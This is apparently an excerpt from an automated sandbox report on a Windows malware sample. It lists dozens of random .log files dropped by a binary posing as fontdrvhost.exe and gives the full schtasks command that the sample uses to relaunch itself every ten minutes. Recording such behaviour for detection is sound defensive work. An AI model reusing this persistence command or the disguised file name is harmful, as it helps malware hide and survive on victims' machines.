                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\mJblSiJK.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\WAZwZzli.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\aFyNQRuY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\SbqYhYfr.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\IsWIxvZJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\qguCdZEu.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YUSxJEkf.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\NgoGZspx.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\TYRgCYum.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\sihlzJJp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\iANVPgEI.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YMjefUJa.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\WgOpYqoh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\KnZYovDz.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\lCADkPID.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\QfCxRbIn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\rudcNvNr.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\WYfWtHNc.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ELDRalsN.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\rmtKjMmm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\iJlVzTXF.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YVGePHcW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\HlvZPcYC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\bAJNFhyM.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\TWBYVoif.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\RMfXVWDe.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\AFOsBjYP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zzDSBAiP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\hsmnhNDB.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\XEIwxBIS.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\wOXBumXW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\eCwwaQCH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\TORFqFIZ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\JfyqGcCs.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\sYhLnqXd.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ikDUDecv.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YBjETBXN.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\HuSZzPsz.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\piqUgtXk.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\fzXEwQRC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ULtOMFWU.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\DEcjsSrF.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\sQxsIGwX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\aABfDneW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ipFMCTyG.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\RnzHiPIs.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\pntLeisv.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\VWGgLdif.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\EOpBrqDR.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\mCNvXUiC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\TlbPEPXm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zTojkKNX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ZtZwWUdP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\OemrfNDp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\FvSbvlyH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\uHokLZDZ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\LovAYRCw.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zuGjoWSN.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\inpEUjnz.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\XzKOkXsR.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\HxFJRUCD.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\qiEMTywj.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\fuaVjmBB.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\OnJqPAWm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\JvAHRkKP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\COTaDrJc.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\lHCvjEeO.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\bYjfzcZg.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\QkEpPQey.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\IHwzgXOR.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\rAfUMkjC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\OzZYIDTF.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\EQFIYaOX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\nJodFojJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\dbVNVLdb.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\AaPSReOe.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\rrvChBIx.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\hJcmyZDP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\PwAgeDiA.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\xkYbKhNl.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\WuogHSdp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\MLVQXpXH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\DdBAnNSZ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\uztLDTCs.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\kQZvTrxL.logJump to dropped file

                        Boot Survival

                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /f
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exe
                        Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe
                        Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
